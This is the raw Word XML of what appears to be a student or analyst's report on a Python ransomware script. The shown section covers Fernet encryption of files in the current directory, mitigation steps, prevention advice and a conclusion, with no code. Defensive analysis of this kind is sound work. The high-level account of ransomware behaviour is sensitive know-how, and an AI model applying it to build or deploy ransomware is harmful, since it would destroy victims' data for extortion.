    <w:p w14:paraId="6591869F" w14:textId="77777777" w:rsidR="00BB75C5" w:rsidRPr="00BB75C5" w:rsidRDefault="00BB75C5" w:rsidP="00BB75C5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB75C5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Encryption Method:</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB75C5">
        <w:t xml:space="preserve"> Fernet symmetric encryption</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AE66F89" w14:textId="77777777" w:rsidR="00BB75C5" w:rsidRPr="00BB75C5" w:rsidRDefault="00BB75C5" w:rsidP="00BB75C5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB75C5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Affected Files:</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB75C5">
        <w:t xml:space="preserve"> All files in the current directory, except mymalware.py, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BB75C5">
        <w:t>mykey.key</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BB75C5">
        <w:t>, and decrypt.py.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15519238" w14:textId="77777777" w:rsidR="00BB75C5" w:rsidRPr="00BB75C5" w:rsidRDefault="0007443A" w:rsidP="00BB75C5">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:pict w14:anchorId="503F3AD6">
          <v:rect id="_x0000_i1028" alt="" style="width:451.3pt;height:.05pt;mso-width-percent:0;mso-height-percent:0;mso-width-percent:0;mso-height-percent:0" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="756331B4" w14:textId="77777777" w:rsidR="00BB75C5" w:rsidRPr="003202BC" w:rsidRDefault="00BB75C5" w:rsidP="00BB75C5">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003202BC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>5. Mitigation Steps</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7976AB8A" w14:textId="77777777" w:rsidR="00BB75C5" w:rsidRPr="00BB75C5" w:rsidRDefault="00BB75C5" w:rsidP="00BB75C5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB75C5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Do not pay the ransom</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB75C5">
        <w:t>: Paying the ransom does not guarantee that the attacker will decrypt the files.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="589FD5BA" w14:textId="77777777" w:rsidR="00BB75C5" w:rsidRPr="00BB75C5" w:rsidRDefault="00BB75C5" w:rsidP="00BB75C5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB75C5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Disconnect from the network</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB75C5">
        <w:t>: To prevent further encryption or propagation, disconnect the infected system from the network.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06D71F82" w14:textId="77777777" w:rsidR="00BB75C5" w:rsidRPr="00BB75C5" w:rsidRDefault="00BB75C5" w:rsidP="00BB75C5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB75C5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Restore from backups</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB75C5">
        <w:t>: If possible, restore encrypted files from secure backups.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05E07707" w14:textId="77777777" w:rsidR="00BB75C5" w:rsidRPr="00BB75C5" w:rsidRDefault="00BB75C5" w:rsidP="00BB75C5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB75C5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Key Recovery</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB75C5">
        <w:t xml:space="preserve">: If the attacker is contacted and provides the decryption key, use the key to decrypt the files. However, there is no guarantee that the attacker will </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BB75C5">
        <w:t>honor</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BB75C5">
        <w:t xml:space="preserve"> the demand.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F42EEE2" w14:textId="77777777" w:rsidR="00BB75C5" w:rsidRPr="00BB75C5" w:rsidRDefault="00BB75C5" w:rsidP="00BB75C5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB75C5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Security Measures</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB75C5">
        <w:t>: Ensure that the system has adequate protections, such as updated antivirus, firewalls, and security patches.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15D31571" w14:textId="77777777" w:rsidR="00BB75C5" w:rsidRPr="00BB75C5" w:rsidRDefault="00BB75C5" w:rsidP="00BB75C5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB75C5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Incident Reporting</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB75C5">
        <w:t>: Report the attack to relevant authorities (e.g., local law enforcement, CERT teams).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DEA5283" w14:textId="77777777" w:rsidR="00BB75C5" w:rsidRPr="00BB75C5" w:rsidRDefault="0007443A" w:rsidP="00BB75C5">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:pict w14:anchorId="24C0F74A">
          <v:rect id="_x0000_i1027" alt="" style="width:451.3pt;height:.05pt;mso-width-percent:0;mso-height-percent:0;mso-width-percent:0;mso-height-percent:0" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="016C49DB" w14:textId="77777777" w:rsidR="00BB75C5" w:rsidRPr="003202BC" w:rsidRDefault="00BB75C5" w:rsidP="00BB75C5">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003202BC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>6. Suggestions for Prevention</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3259F701" w14:textId="77777777" w:rsidR="00BB75C5" w:rsidRPr="00BB75C5" w:rsidRDefault="00BB75C5" w:rsidP="00BB75C5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB75C5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Backup Strategy</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB75C5">
        <w:t>: Regularly back up important files and store them securely (offline or cloud).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4065ADCB" w14:textId="77777777" w:rsidR="00BB75C5" w:rsidRPr="00BB75C5" w:rsidRDefault="00BB75C5" w:rsidP="00BB75C5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB75C5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Security Training</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB75C5">
        <w:t>: Educate users on avoiding phishing attacks and suspicious downloads.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17C90E37" w14:textId="77777777" w:rsidR="00BB75C5" w:rsidRPr="00BB75C5" w:rsidRDefault="00BB75C5" w:rsidP="00BB75C5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB75C5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Endpoint Protection</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB75C5">
        <w:t>: Use endpoint protection software to detect and block malicious scripts.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17331E76" w14:textId="77777777" w:rsidR="00BB75C5" w:rsidRPr="00BB75C5" w:rsidRDefault="00BB75C5" w:rsidP="00BB75C5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB75C5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Network Security</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB75C5">
        <w:t>: Ensure that the network is segmented and use strong access controls to limit exposure.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F245D7A" w14:textId="77777777" w:rsidR="00BB75C5" w:rsidRPr="00BB75C5" w:rsidRDefault="00BB75C5" w:rsidP="00BB75C5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB75C5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Update and Patch</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB75C5">
        <w:t>: Keep the system and all installed software up to date with the latest security patches.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5122C52C" w14:textId="77777777" w:rsidR="00BB75C5" w:rsidRPr="00BB75C5" w:rsidRDefault="0007443A" w:rsidP="00BB75C5">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:pict w14:anchorId="19DB99AB">
          <v:rect id="_x0000_i1026" alt="" style="width:451.3pt;height:.05pt;mso-width-percent:0;mso-height-percent:0;mso-width-percent:0;mso-height-percent:0" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DF2F723" w14:textId="77777777" w:rsidR="00BB75C5" w:rsidRPr="003202BC" w:rsidRDefault="00BB75C5" w:rsidP="00BB75C5">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003202BC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>7. Conclusion</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CFFBE80" w14:textId="77777777" w:rsidR="00BB75C5" w:rsidRPr="00BB75C5" w:rsidRDefault="00BB75C5" w:rsidP="00BB75C5">
      <w:r w:rsidRPr="00BB75C5">
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BB75C5">
        <w:t>analyzed</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BB75C5">
        <w:t xml:space="preserve"> script is a ransomware that encrypts files in the current directory and demands a Bitcoin ransom. Users and organizations are strongly advised to avoid paying the ransom and instead focus on restoring encrypted data from backups or other recovery methods. Additional security measures, such as endpoint protection and regular backups, should be implemented to mitigate the risk of ransomware attacks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A3C0499" w14:textId="77777777" w:rsidR="00BB75C5" w:rsidRPr="00BB75C5" w:rsidRDefault="0007443A" w:rsidP="00BB75C5">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:pict w14:anchorId="18A2E90D">
          <v:rect id="_x0000_i1025" alt="" style="width:451.3pt;height:.05pt;mso-width-percent:0;mso-height-percent:0;mso-width-percent:0;mso-height-percent:0" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B894218" w14:textId="4E15AC0B" w:rsidR="00BB75C5" w:rsidRPr="00BB75C5" w:rsidRDefault="00BB75C5" w:rsidP="00BB75C5">
      <w:r w:rsidRPr="003202BC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>Report Prepared by:</w:t>
      </w:r>
      <w:r w:rsidRPr="003202BC">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> [Harsh Vardhan Singh]</w:t>
      </w:r>
      <w:r w:rsidRPr="003202BC">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="003202BC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>Date of Analysis:</w:t>
      </w:r>
      <w:r w:rsidRPr="003202BC">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> March 2024</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D98C5A8" w14:textId="77777777" w:rsidR="002B1ECF" w:rsidRDefault="002B1ECF"/>
    <w:sectPr w:rsidR="002B1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90F05"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="BBB0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B5D15"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="5D7E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E686E"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="0E7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56FAF"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="D9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C5"/>
    <w:rsid w:val="0007443A"/>
    <w:rsid w:val="002B1ECF"/>
    <w:rsid w:val="003202BC"/>
    <w:rsid w:val="006812DE"/>
    <w:rsid w:val="008322A5"/>
    <w:rsid w:val="00B17592"/>
    <w:rsid w:val="00BB75C5"/>
    <w:rsid w:val="00C51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D6BD"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{56454259-A103-4363-A338-BDE24BC4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721222">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="175579623">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="1633052136">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="1502432567">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
              <w:divsChild>
                <w:div w:id="543442397">
                  <w:marLeft w:val="0"/>
                  <w:marRight w:val="0"/>
                  <w:marTop w:val="0"/>
                  <w:marBottom w:val="0"/>
                  <w:divBdr>
                    <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                  </w:divBdr>
                  <w:divsChild>
                    <w:div w:id="7616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6320">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
          </w:divsChild>
        </w:div>
        <w:div w:id="2083596927">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="928543469">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="1580216674">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
              <w:divsChild>
                <w:div w:id="2075855928">
                  <w:marLeft w:val="0"/>
                  <w:marRight w:val="0"/>
                  <w:marTop w:val="0"/>
                  <w:marBottom w:val="0"/>
                  <w:divBdr>
                    <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                  </w:divBdr>
                  <w:divsChild>
                    <w:div w:id="1806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664">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
          </w:divsChild>
        </w:div>
        <w:div w:id="757140322">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="1366373312">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="1895696607">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
              <w:divsChild>
                <w:div w:id="1047685811">
                  <w:marLeft w:val="0"/>
                  <w:marRight w:val="0"/>
                  <w:marTop w:val="0"/>
                  <w:marBottom w:val="0"/>
                  <w:divBdr>
                    <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                  </w:divBdr>
                  <w:divsChild>
                    <w:div w:id="19284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2028">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
          </w:divsChild>
        </w:div>
        <w:div w:id="1462960254">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="996105769">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="1468547432">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
              <w:divsChild>
                <w:div w:id="755787662">
                  <w:marLeft w:val="0"/>
                  <w:marRight w:val="0"/>
                  <w:marTop w:val="0"/>
                  <w:marBottom w:val="0"/>
                  <w:divBdr>
                    <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                  </w:divBdr>
                  <w:divsChild>
                    <w:div w:id="15752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8509">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="1939214028">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="652681373">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="1559321724">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
              <w:divsChild>
                <w:div w:id="2067486945">
                  <w:marLeft w:val="0"/>
                  <w:marRight w:val="0"/>
                  <w:marTop w:val="0"/>
                  <w:marBottom w:val="0"/>
                  <w:divBdr>
                    <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                  </w:divBdr>
                  <w:divsChild>
                    <w:div w:id="9958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1458">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
          </w:divsChild>
        </w:div>
        <w:div w:id="592712681">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="635837335">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="1559054951">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
